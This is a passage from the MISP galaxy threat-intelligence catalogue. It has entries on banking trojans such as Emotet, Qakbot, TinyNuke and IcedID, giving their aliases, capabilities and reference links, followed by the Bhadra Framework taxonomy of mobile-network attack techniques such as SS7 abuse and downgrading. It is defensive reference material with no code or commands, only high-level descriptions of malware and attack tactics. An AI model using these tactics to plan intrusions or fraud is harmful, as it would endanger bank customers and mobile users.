https://blog.avast.com/2014/09/15/tiny-banker-trojan-targets-customers-of-major-banks-worldwide/

http://my.infotex.com/tiny-banker-trojan/

Geodo

Geodo is a banking trojan delivered primarily through malspam emails. It is capable of sniffing network activity to steal information by hooking certain network API calls.

The tag is: misp-galaxy:banker="Geodo"

Geodo is also known as:

  • Feodo Version C

  • Emotet

Geodo has relationships with:

  • similar: misp-galaxy:tool="Emotet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Emotet" with estimative-language:likelihood-probability="likely"

Table 661. Table References

Links

https://feodotracker.abuse.ch/

http://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/

https://www.bleepingcomputer.com/news/security/emotet-banking-trojan-loves-usa-internet-providers/

https://www.bleepingcomputer.com/news/security/emotet-returns-with-thanksgiving-theme-and-better-phishing-tricks/

https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet

https://cofense.com/major-us-financial-institutions-imitated-advanced-geodo-emotet-phishing-lures-appear-authentic-containing-proofpoint-url-wrapped-links/

Feodo

Feodo is a banking trojan that utilizes web injects and is also capable of monitoring & manipulating cookies. Version A = Port 8080, Version B = Port 80 It is delivered primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Feodo"

Feodo is also known as:

  • Bugat

  • Cridex

Feodo has relationships with:

  • similar: misp-galaxy:tool="Dridex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="likely"

Table 662. Table References

Links

https://securelist.com/dridex-a-history-of-evolution/78531/

https://feodotracker.abuse.ch/

http://stopmalvertising.com/rootkits/analysis-of-cridex.html

Ramnit

Originally not a banking trojan in 2010, Ramnit became a banking trojan after the Zeus source code leak. It is capable of perforrming Man-in-the-Browser attacks. Distributed primarily via exploit kits.

The tag is: misp-galaxy:banker="Ramnit"

Ramnit is also known as:

  • Nimnul

Ramnit has relationships with:

  • similar: misp-galaxy:botnet="Ramnit" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Ramnit" with estimative-language:likelihood-probability="likely"

Table 663. Table References

Links

https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/

Qakbot

Qakbot is a banking trojan that leverages webinjects to steal banking information from victims. It also utilizes DGA for command and control. It is primarily delivered via exploit kits.

The tag is: misp-galaxy:banker="Qakbot"

Qakbot is also known as:

  • Qbot

  • Pinkslipbot

  • Akbot

Qakbot has relationships with:

  • similar: misp-galaxy:tool="Akbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="QakBot" with estimative-language:likelihood-probability="likely"

Table 664. Table References

Links

https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/

https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/

https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf

Corebot

Corebot is a modular trojan that leverages a banking module that can perform browser hooking, form grabbing, MitM, webinjection to steal financial information from victims. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Corebot"

Corebot has relationships with:

  • similar: misp-galaxy:malpedia="Corebot" with estimative-language:likelihood-probability="likely"

Table 665. Table References

Links

https://securityintelligence.com/an-overnight-sensation-corebot-returns-as-a-full-fledged-financial-malware/

https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf

https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/

TinyNuke

TinyNuke is a modular banking trojan that includes a HiddenDesktop/VNC server and reverse SOCKS 4 server. It’s main functionality is to make web injections into specific pages to steal user data. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="TinyNuke"

TinyNuke is also known as:

  • NukeBot

  • Nuclear Bot

  • MicroBankingTrojan

  • Xbot

TinyNuke has relationships with:

  • similar: misp-galaxy:mitre-tool="Xbot - S0298" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Xbot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 666. Table References

Links

https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/

https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/

https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596

https://benkowlab.blogspot.ca/2017/08/quick-look-at-another-alina-fork-xbot.html

Retefe

Retefe is a banking trojan that is distributed by what SWITCH CERT calls the Retefe gang or Operation Emmental. It uses geolocation based targeting. It also leverages fake root certificate and changes the DNS server for domain name resolution in order to display fake banking websites to victims. It is spread primarily through malspam emails.

The tag is: misp-galaxy:banker="Retefe"

Retefe is also known as:

  • Tsukuba

  • Werdlod

Retefe has relationships with:

  • similar: misp-galaxy:malpedia="Retefe (Android)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dok" with estimative-language:likelihood-probability="likely"

Table 667. Table References

Links

https://www.govcert.admin.ch/blog/33/the-retefe-saga

https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/

https://countuponsecurity.com/2016/02/29/retefe-banking-trojan/

https://securityblog.switch.ch/2014/11/05/retefe-with-a-new-twist/

http://securityintelligence.com/tsukuba-banking-trojan-phishing-in-japanese-waters/

ReactorBot

ReactorBot is sometimes mistakenly tagged as Rovnix. ReactorBot is a full fledged modular bot that includes a banking module that has roots with the Carberp banking trojan. Distributed primarily via malspam emails.

The tag is: misp-galaxy:banker="ReactorBot"

ReactorBot has relationships with:

  • similar: misp-galaxy:malpedia="ReactorBot" with estimative-language:likelihood-probability="likely"

Table 668. Table References

Links

http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html

https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under

http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html

http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/

Matrix Banker

Matrix Banker is named accordingly because of the Matrix reference in it’s C2 panel. Distributed primarily via malspam emails.

The tag is: misp-galaxy:banker="Matrix Banker"

Matrix Banker has relationships with:

  • similar: misp-galaxy:malpedia="Matrix Banker" with estimative-language:likelihood-probability="likely"

Table 669. Table References

Links

https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/

Zeus Gameover

Zeus Gameover captures banking credentials from infected computers, then use those credentials to initiate or re-direct wire transfers to accounts overseas that are controlled by the criminals. GameOver has a decentralized, peer-to-peer command and control infrastructure rather than centralized points of origin. Distributed primarily via malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Zeus Gameover"

Table 670. Table References

Links

https://heimdalsecurity.com/blog/zeus-gameover/

https://www.us-cert.gov/ncas/alerts/TA14-150A

SpyEye

SpyEye is a similar to the Zeus botnet banking trojan. It utilizes a web control panel for C2 and can perform form grabbing, autofill credit card modules, ftp grabber, pop3 grabber and HTTP basic access authorization grabber. It also contained a Kill Zeus feature which would remove any Zeus infections if SpyEye was on the system. Distributed primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="SpyEye"

Table 671. Table References

Links

https://www.ioactive.com/pdfs/ZeusSpyEyeBankingTrojanAnalysis.pdf

https://www.computerworld.com/article/2509482/security0/spyeye-trojan-defeating-online-banking-defenses.html

https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot

Citadel

Citadel is an offspring of the Zeus banking trojan. Delivered primarily via exploit kits.

The tag is: misp-galaxy:banker="Citadel"

Citadel has relationships with:

  • similar: misp-galaxy:malpedia="Citadel" with estimative-language:likelihood-probability="likely"

Table 672. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/

https://krebsonsecurity.com/tag/citadel-trojan/

https://securityintelligence.com/cybercriminals-use-citadel-compromise-password-management-authentication-solutions/

Atmos

Atmos is derived from the Citadel banking trojan. Delivered primarily via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Atmos"

Table 673. Table References

Links

https://heimdalsecurity.com/blog/security-alert-citadel-trojan-resurfaces-atmos-zeus-legacy/

http://www.xylibox.com/2016/02/citadel-0011-atmos.html

Ice IX

Ice IX is a bot created using the source code of ZeuS 2.0.8.9. No major improvements compared to ZeuS 2.0.8.9.

The tag is: misp-galaxy:banker="Ice IX"

Ice IX has relationships with:

  • similar: misp-galaxy:malpedia="Ice IX" with estimative-language:likelihood-probability="likely"

Table 674. Table References

Links

https://securelist.com/ice-ix-not-cool-at-all/29111/ [https://securelist.com/ice-ix-not-cool-at-all/29111/ ]

Zitmo

Zeus in the mobile. Banking trojan developed for mobile devices such as Windows Mobile, Blackberry and Android.

The tag is: misp-galaxy:banker="Zitmo"

Table 675. Table References

Links

https://securelist.com/zeus-in-the-mobile-for-android-10/29258/

Licat

Banking trojan based on Zeus V2. Murofet is a newer version of Licat found ~end of 2011

The tag is: misp-galaxy:banker="Licat"

Licat is also known as:

  • Murofet

Licat has relationships with:

  • similar: misp-galaxy:malpedia="Murofet" with estimative-language:likelihood-probability="likely"

Table 676. Table References

Links

https://johannesbader.ch/2015/09/three-variants-of-murofets-dga/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_LICAT.A

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus%3aWin32%2fMurofet.A

Skynet

Skynet is a Tor-powered trojan with DDoS, Bitcoin mining and Banking capabilities. Spread via USENET as per rapid7.

The tag is: misp-galaxy:banker="Skynet"

Table 677. Table References

Links

https://blog.rapid7.com/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit/

IcedID

According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched. Our researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan. At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites in the U.S. Two major banks in the U.K. are also on the target list the malware fetches.

The tag is: misp-galaxy:banker="IcedID"

IcedID is also known as:

  • BokBot

IcedID has relationships with:

  • similar: misp-galaxy:malpedia="IcedID" with estimative-language:likelihood-probability="likely"

Table 678. Table References

Links

https://www.bleepingcomputer.com/news/security/new-icedid-banking-trojan-discovered/

https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

http://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

GratefulPOS

GratefulPOS has the following functions 1. Access arbitrary processes on the target POS system 2. Scrape track 1 and 2 payment card data from the process(es) 3. Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014[iii], and more recently by Luis Mendieta of Anomoli in analysis of a precursor to this sample.

The tag is: misp-galaxy:banker="GratefulPOS"

GratefulPOS has relationships with:

  • similar: misp-galaxy:tool="GratefulPOS" with estimative-language:likelihood-probability="likely"

Table 679. Table References

Links

https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season

Dok

A macOS banking trojan that that redirects an infected user’s web traffic in order to extract banking credentials.

The tag is: misp-galaxy:banker="Dok"

Dok has relationships with:

  • similar: misp-galaxy:malpedia="Retefe (Android)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dok" with estimative-language:likelihood-probability="likely"

Table 680. Table References

Links

https://objective-see.com/blog/blog_0x25.html#Dok

downAndExec

Services like Netflix use content delivery networks (CDNs) to maximize bandwidth usage as it gives users greater speed when viewing the content, as the server is close to them and is part of the Netflix CDN. This results in faster loading times for series and movies, wherever you are in the world. But, apparently, the CDNs are starting to become a new way of spreading malware. The attack chain is very extensive, and incorporates the execution of remote scripts (similar in some respects to the recent “fileless” banking malware trend), plus the use of CDNs for command and control (C&C), and other standard techniques for the execution and protection of malware.

The tag is: misp-galaxy:banker="downAndExec"

Table 681. Table References

Links

https://www.welivesecurity.com/2017/09/13/downandexec-banking-malware-cdns-brazil/

Smominru

Since the end of May 2017, we have been monitoring a Monero miner that spreads using the EternalBlue Exploit (CVE-2017-0144). The miner itself, known as Smominru (aka Ismo) has been well-documented, so we will not discuss its post-infection behavior. However, the miner’s use of Windows Management Infrastructure is unusual among coin mining malware. The speed at which mining operations conduct mathematical operations to unlock new units of cryptocurrency is referred to as “hash power”. Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz. The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week.

The tag is: misp-galaxy:banker="Smominru"

Smominru is also known as:

  • Ismo

  • lsmo

Smominru has relationships with:

  • similar: misp-galaxy:malpedia="Smominru" with estimative-language:likelihood-probability="likely"

Table 682. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators

DanaBot

It’s a Trojan that includes banking site web injections and stealer functions. It consists of a downloader component that downloads an encrypted file containing the main DLL. The DLL, in turn, connects using raw TCP connections to port 443 and downloads additional modules (i.e. VNCDLL.dll, StealerDLL.dll, ProxyDLL.dll)

The tag is: misp-galaxy:banker="DanaBot"

DanaBot has relationships with:

  • similar: misp-galaxy:malpedia="DanaBot" with estimative-language:likelihood-probability="likely"

Table 683. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0

https://www.bleepingcomputer.com/news/security/danabot-banking-malware-now-targeting-banks-in-the-us/

Backswap

The banker is distributed through malicious email spam campaigns. Instead of using complex process injection methods to monitor browsing activity, the malware hooks key Windows message loop events in order to inspect values of the window objects for banking activity. The payload is delivered as a modified version of a legitimate application that is partially overwritten by the malicious payload

The tag is: misp-galaxy:banker="Backswap"

Table 684. Table References

Links

https://www.cert.pl/news/single/analiza-zlosliwego-oprogramowania-backswap/

https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/

Bebloh

The tag is: misp-galaxy:banker="Bebloh"

Bebloh is also known as:

  • URLZone

  • Shiotob

Bebloh has relationships with:

  • similar: misp-galaxy:malpedia="UrlZone" with estimative-language:likelihood-probability="likely"

Table 685. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Bebloh.A

https://www.symantec.com/security-center/writeup/2011-041411-0912-99

Banjori

The tag is: misp-galaxy:banker="Banjori"

Banjori is also known as:

  • MultiBanker 2

  • BankPatch

  • BackPatcher

Banjori has relationships with:

  • similar: misp-galaxy:malpedia="Banjori" with estimative-language:likelihood-probability="likely"

Table 686. Table References

Links

https://www.johannesbader.ch/2015/02/the-dga-of-banjori/

Qadars

The tag is: misp-galaxy:banker="Qadars"

Qadars has relationships with:

  • similar: misp-galaxy:malpedia="Qadars" with estimative-language:likelihood-probability="likely"

Table 687. Table References

Links

https://www.countercept.com/our-thinking/decrypting-qadars-banking-trojan-c2-traffic/

Sisron

The tag is: misp-galaxy:banker="Sisron"

Table 688. Table References

Links

https://www.johannesbader.ch/2016/06/the-dga-of-sisron/

Ranbyus

The tag is: misp-galaxy:banker="Ranbyus"

Ranbyus has relationships with:

  • similar: misp-galaxy:malpedia="Ranbyus" with estimative-language:likelihood-probability="likely"

Table 689. Table References

Links

https://www.johannesbader.ch/2016/06/the-dga-of-sisron/

Fobber

The tag is: misp-galaxy:banker="Fobber"

Fobber has relationships with:

  • similar: misp-galaxy:malpedia="Fobber" with estimative-language:likelihood-probability="likely"

Table 690. Table References

Links

https://searchfinancialsecurity.techtarget.com/news/4500249201/Fobber-Drive-by-financial-malware-returns-with-new-tricks

Karius

Trojan under development and already being distributed through the RIG Exploit Kit. Observed code similarities with other well-known bankers such as Ramnit, Vawtrak and TrickBot. Karius works in a rather traditional fashion to other banking malware and consists of three components (injector32\64.exe, proxy32\64.dll and mod32\64.dll), these components essentially work together to deploy webinjects in several browsers.

The tag is: misp-galaxy:banker="Karius"

Karius has relationships with:

  • similar: misp-galaxy:malpedia="Karius" with estimative-language:likelihood-probability="likely"

Table 691. Table References

Links

https://research.checkpoint.com/banking-trojans-development/

Kronos

Kronos was a type of banking malware first reported in 2014. It was sold for $7000. As of September 2015, a renew version was reconnecting with infected bots and sending them a brand new configuration file against U.K. banks and one bank in India. Similar to Zeus it was focused on stealing banking login credentials from browser sessions. A new version of this malware appears to have been used in 2018, the main difference is that the 2018 edition uses Tor-hosted C&C control panels.

The tag is: misp-galaxy:banker="Kronos"

Kronos has relationships with:

  • similar: misp-galaxy:malpedia="Kronos" with estimative-language:likelihood-probability="likely"

Table 692. Table References

Links

https://en.wikipedia.org/wiki/Kronos_(malware)

https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware

https://www.bleepingcomputer.com/news/security/new-version-of-the-kronos-banking-trojan-discovered/

CamuBot

A newly discovered banking Trojan departs from the regular tactics observed by malware researchers by choosing visible installation and by adding social engineering components. CamuBot appeared last month in Brazil targeting companies and organizations from the public sector. The victim is the one installing the malware, at the instructions of a human operator that pretends to be a bank employee.

The tag is: misp-galaxy:banker="CamuBot"

CamuBot has relationships with:

  • similar: misp-galaxy:malpedia="CamuBot" with estimative-language:likelihood-probability="likely"

Table 693. Table References

Links

https://www.bleepingcomputer.com/news/security/new-banking-trojan-poses-as-a-security-module/ [https://www.bleepingcomputer.com/news/security/new-banking-trojan-poses-as-a-security-module/ ]

Dark Tequila

Dark Tequila has primarily been designed to steal victims’ financial information from a long list of online banking sites, as well as login credentials to popular websites, ranging from code versioning repositories to public file storage accounts and domain registrars.

The tag is: misp-galaxy:banker="Dark Tequila"

Table 694. Table References

Links

https://thehackernews.com/2018/08/mexico-banking-malware.html

Malteiro

Distributed by Malteiro

The tag is: misp-galaxy:banker="Malteiro"

Malteiro is also known as:

  • URSA

Malteiro has relationships with:

  • delivered-by: misp-galaxy:threat-actor="Malteiro" with estimative-language:likelihood-probability="likely"

Table 695. Table References

Links

https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/

Bhadra Framework

Bhadra Threat Modeling Framework.

Bhadra Framework is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Siddharth Prakash Rao - Silke Holtmanns - Tuomas Aura

Attacks from UE

"Attacks from UE" refers to any technique that involves the attacks launched by the software or hardware components of the user equipment to send malicious traffic into the mobile network.

The tag is: misp-galaxy:bhadra-framework="Attacks from UE"

SIM-based attacks

The "SIM-based attacks" are the techniques that involve any physical smart cards, namely SIM from 2G, USIM from 3G, and UICC from 4G networks.

The tag is: misp-galaxy:bhadra-framework="SIM-based attacks"

Attacks from radio access network

The "attacks from radio access network" are the techniques where an adversary with radio capabilities impersonates the mobile network to the UE (or vice versa) and becomes a man-in-the-middle.

The tag is: misp-galaxy:bhadra-framework="Attacks from radio access network"

Attacks from other mobile network

The "attacks from other mobile networks" and the "attacks with physical access to transport network" techniques can be conducted by evil mobile operators, law enforcement agencies for legal interception and human insiders with access to network nodes

The tag is: misp-galaxy:bhadra-framework="Attacks from other mobile network"

Attacks with access to transport network

The "attacks from other mobile networks" and the "attacks with physical access to transport network" techniques can be conducted by evil mobile operators, law enforcement agencies for legal interception and human insiders with access to network nodes

The tag is: misp-galaxy:bhadra-framework="Attacks with access to transport network"

Attacks from IP-based network

The "attacks from IP-based attacks" techniques mostly are launched from the service and application network, which allows non operator entities to infuse malicious trac into an operator’s network.

The tag is: misp-galaxy:bhadra-framework="Attacks from IP-based network"

Insider attacks and human errors

The "insider attacks and human errors" technique involve the intentional attacks and unintentional mistakes from human insiders with access to any component of the mobile communication ecosystem.

The tag is: misp-galaxy:bhadra-framework="Insider attacks and human errors"

Infecting UE hardware or software

Retaining the foothold gained on the target system through the initial access by infecting UE hardware or software.

The tag is: misp-galaxy:bhadra-framework="Infecting UE hardware or software"

Infecting SIM cards

Retaining the foothold gained on the target system through the initial access by infecting SIM cards.

The tag is: misp-galaxy:bhadra-framework="Infecting SIM cards"

Spoofed radio network

Retaining the foothold gained on the target system through the initial access by radio network spoofing.

The tag is: misp-galaxy:bhadra-framework="Spoofed radio network"

Infecting network nodes

Retaining the foothold gained on the target system through the initial access by infecting network nodes.

The tag is: misp-galaxy:bhadra-framework="Infecting network nodes"

Covert channels

Retaining the foothold gained on the target system through the initial access via covert channels.

The tag is: misp-galaxy:bhadra-framework="Covert channels"

Port scanning or sweeping

"Port scanning or sweeping" techniques to probe servers or hosts with open ports.

The tag is: misp-galaxy:bhadra-framework="Port scanning or sweeping"

Perimeter mapping

"perimeter mapping" techniques such as command-line utilities (e.g., nmap and whois), web-based lookup tools and official APIs provided by the Internet registrars that assign the ASNs using a wide range of publicly available sources.

The tag is: misp-galaxy:bhadra-framework="Perimeter mapping"

Threat intelligence gathering

"Threat intelligence gathering" using dedicated search engines (such as Censys, Shodan) to gather information about vulnerable devices or networks, or using advanced search options of traditional search engines.

The tag is: misp-galaxy:bhadra-framework="Threat intelligence gathering"

CN-specific scanning

"CN-specific scanning", used to scan nodes that are interconnected with protocols specific to the mobile communication domain (GTP, SCTP).

The tag is: misp-galaxy:bhadra-framework="CN-specific scanning"

"Internal resource search" refers to an insider with access to provider internal databases abusing the information as a discovery tactic.

The tag is: misp-galaxy:bhadra-framework="Internal resource search"

UE knocking

"UE knocking" refers to the technique that scans User Equipment, similarly to how IP endpoints and core network nodes are scanned or mapped.

The tag is: misp-galaxy:bhadra-framework="UE knocking"

Exploit roaming agreements

"Exploit roaming agreements" is a technique exploited by evil mobile operators. Despite communication with operators is dependent on a roaming agreement being in place, an attacker that has gained a foothold with one operator, it can abuse the roaming agreements in place for lateral movement with all adjacent operators with agreements in place.

The tag is: misp-galaxy:bhadra-framework="Exploit roaming agreements"

Abusing interworking functionalities

"Abusing Inter-working functionalities" is a technique for adversaries to move between networks of different generations laterally

The tag is: misp-galaxy:bhadra-framework="Abusing interworking functionalities"

Exploit platform & service-specific vulnerabilities

Once an attacker has gained a foothold in an operator, it can conduct privilege escalation and process injection for gaining administrative rights, password cracking of valid user accounts on the nodes, exploit vulnerabilities in databases and file systems, and take advantage of improper configurations of routers and switches.

The tag is: misp-galaxy:bhadra-framework="Exploit platform & service-specific vulnerabilities"

SS7-based-attacks

Attacks abusing the SS7 protocol.

The tag is: misp-galaxy:bhadra-framework="SS7-based-attacks"

Diameter-based attacks

Attacks abusing the Diameter protocol.

The tag is: misp-galaxy:bhadra-framework="Diameter-based attacks"

GTP-based attacks

Attacks abusing the GTP protocol.

The tag is: misp-galaxy:bhadra-framework="GTP-based attacks"

DNS-based attacks

DNS based attacks.

The tag is: misp-galaxy:bhadra-framework="DNS-based attacks"

Pre-AKA attacks

Attack techniques that take place during the unencrypted communication that occurs prior to the AKA protocol.

The tag is: misp-galaxy:bhadra-framework="Pre-AKA attacks"

Security audit camouflage

The operating systems, software, and services used on the network nodes are prone to security vulnerabilities and installation of unwanted malware. Although operators conduct routine security audits to track and patch the vulnerabilities or remove the malware from the infected nodes, their effectiveness is not known to the public. Any means by which an adversary can remain undetected from such audits are referred to as the security audit camouflage technique.

The tag is: misp-galaxy:bhadra-framework="Security audit camouflage"

Blacklist evasion

Mobile operators employ several defenses in terms of securing their network traffic. For instance, operators maintain a whitelist of IPs and GTs of nodes from their own infrastructure and their partner operators (as agreed in IR 21), and traffic from only these nodes are processed. Similarly, a blacklist is also maintained to control spam due to configuration errors and malicious traffic. Anything from the blacklist is banned from entering the operator’s network. Such defense mechanisms may defend against unsolicited traffic from external networks (e.g., from the public Internet and SAN), but it barely serves its purpose in the case of attacks from inter-operator communications. Since most of the communication protocols are unauthenticated in nature, an aŠacker with knowledge of identifiers of the allowed nodes (i.e. gained during the discovery phase) can impersonate their identity. We call it the blacklist evasion technique.

The tag is: misp-galaxy:bhadra-framework="Blacklist evasion"

Middlebox misconfiguration exploits

NAT middleboxes are used for separating private networks of mobile operators from public Internet works as the second line of defense. However, studies have shown that the middleboxes deployed by operators are prone to misconfigurations that allow adversaries to infiltrate malicious traffic into mobile networks e.g., by spoofing the IP headers. Some of the other NAT vulnerabilities lie in IPv4-to-IPv6 address mapping logic, which can be exploited by adversaries to exhaust the resources, wipe out the mapping, or to assist with blacklist evasion. Adversaries use such middlebox misconfiguration exploit techniques to launch denial-of-service or over-billing attacks.

The tag is: misp-galaxy:bhadra-framework="Middlebox misconfiguration exploits"

Bypass Firewall

Adversaries (e.g., evil operators) can for example exploit the implicit trust between roaming partners as a bypass firewall technique.

The tag is: misp-galaxy:bhadra-framework="Bypass Firewall"

Bypass homerouting

SMS home routing is a defense mechanism, where an additional SMS router intervenes in external location queries for SMS deliveries, and the roaming network takes the responsibility of delivering the SMS without providing location information to the external entity. Although many operators have implemented SMS home routing solutions, there are no silver bullets. If the SMS routers are incorrectly configured, adversaries can hide SMS delivery location queries within other messages so that the SMS home router fails to process them. We refer to it as the bypass home routing technique.

The tag is: misp-galaxy:bhadra-framework="Bypass homerouting"

Downgrading

Attacks on the radio access networks are well-studied and newer generations are designed to address the weaknesses in previous generations. Usage of weak cryptographic primitives, lack of integrity protection of the radio channels, and one-sided authentication (only from the network) remain as the problem of mostly GSM only radio communication. So, radio link attackers use downgrading as an attack technique to block service over newer generations and accept to serve only in the GSM radio network. The downgrading technique works similarly in the core network, where the adversary accepts to serve only in SS7-based signaling instead of Diameterbased signaling. Using interworking functions for inter-generation communication translation could make the downgrading attacks much easier.

The tag is: misp-galaxy:bhadra-framework="Downgrading"

Redirection

Redirection technique is a variant of the downgrading technique, where an adversary forcefully routes the traffic through networks or components that are under its control. By redirecting traffic to an unsafe network, the adversary can intercept mobile communication (e.g., calls and SMS) on the RAN part. Redirection attacks on the core network result in not only communication interception, but also in billing discrepancies, as an adversary can route the calls of a mobile user from its home network through a foreign network on a higher call rate.

The tag is: misp-galaxy:bhadra-framework="Redirection"

UE Protection evasion

Protection on the UE is mainly available in the form of antivirus apps as a defense against viruses and malware that steals sensitive information (e.g., banking credentials and user passwords) or track user activities. Simple visual cues on UE (such as notifications) could also be a protection mechanism by itself. Unfortunately, mobile network-based attacks cannot be detected or defended effectively from UE’s side by traditional antivirus apps, and such attacks do not trigger any visual signs. Although there are attempts for defending against radio link attacks, including citywide studies to detect IMSI catchers, their effectiveness is still under debate. Similarly, there are recent attempts to detect signaling attacks using distance bounding protocol run from a UE. However, such solutions are still in the research phase, and their effectiveness on a large scale is still untested. To this end, the absence of robust detection and defense mechanisms on the UE is, in fact, an evasion mechanism for an adversary. We refer to them as UE protection evasion techniques.

The tag is: misp-galaxy:bhadra-framework="UE Protection evasion"

Admin credentials

Stealing legitimate admin credentials for critical nodes is beneficial for the adversary to increase its chances of persistence to the target or masquerade its activities.

The tag is: misp-galaxy:bhadra-framework="Admin credentials"

User-specific identifiers

User-specific identifiers such as IMSI and IMEI are an indicator for who owns UE with a specific subscription and where a UE is located physically. Since mobile users always keep their mobile phones physically near them, an adversary with the knowledge of these permanent identifiers will be able to determine whether or not a user is in a specific location. On the other hand, temporary identifiers (e.g., TMSI and GUTI) are used to reduce the usage of permanent identifiers like IMSI over radio channels. Although the temporary identifiers are supposed to change frequently and expected to live for a short period, research has shown that it is not the case

The tag is: misp-galaxy:bhadra-framework="User-specific identifiers"

User-specific data

Adversaries can collect several types of user-specific data, such as the content of SMS and calls, location dumps from base stations, call and billing records, and browsing-related data (such as DNS queries and unencrypted browsing sessions).

The tag is: misp-galaxy:bhadra-framework="User-specific data"

Network-specific identifiers

Adversaries aim to collect network-specific identifiers such as GTs and IPs of critical nodes and Tunnel Endpoint Identifier (TEID) of GTP tunnels from operators’ networks

The tag is: misp-galaxy:bhadra-framework="Network-specific identifiers"

Network-specific data

Adversaries may also be interested in network-specific data that are obtained mainly during the execution of discovery tactics. Such data includes, e.g., the network topology, the trust relationship between different nodes, routing metadata, and sensitive documents

The tag is: misp-galaxy:bhadra-framework="Network-specific data"

Location tracking

Attacker is able to track the location of the target end-user.

The tag is: misp-galaxy:bhadra-framework="Location tracking"

Calls eavesdropping

Attacker is able to eavesdrop on calls.

The tag is: misp-galaxy:bhadra-framework="Calls eavesdropping"

SMS interception

Attacker is able to intercept SMS messages.

The tag is: misp-galaxy:bhadra-framework="SMS interception"

Data interception

Attacker is able to intercept or modify internet traffic.

The tag is: misp-galaxy:bhadra-framework="Data interception"

Billing frauds

Billing frauds refer to various types of attacks where an adversary causes financial discrepancies for operators.

The tag is: misp-galaxy:bhadra-framework="Billing frauds"

DoS - network

The attacker can create signaling havoc in specific nodes of operators by repeatedly triggering resource allocation or revocation requests.

The tag is: misp-galaxy:bhadra-framework="DoS - network"

DoS - user

The attacker can cause denial of service to mobile users.

The tag is: misp-galaxy:bhadra-framework="DoS - user"

Identity-based attacks involve attack techniques using userand network-specific identifiers. Identity-based attacks cause harm to the privacy of mobile users and produce fraudulent traffic that incurs a financial loss to operators. In most cases, identity-based attacks are used in impersonation, where an adversary impersonates a legitimate mobile user to the core network without possessing appropriate credentials, for example, to avail free mobile services. Most of the signaling attacks that use SS7 are also fall into this category. In other cases, identitybased attacks involve identity mapping, where the adversaries map temporary identifiers (e.g., TMSI and GUTI) to permanent identifiers (e.g., IMSI or MSISDN). In rare cases, the IMSI can further be mapped to social media identities.

The tag is: misp-galaxy:bhadra-framework="Identity-related attacks"

Botnet

botnet galaxy.

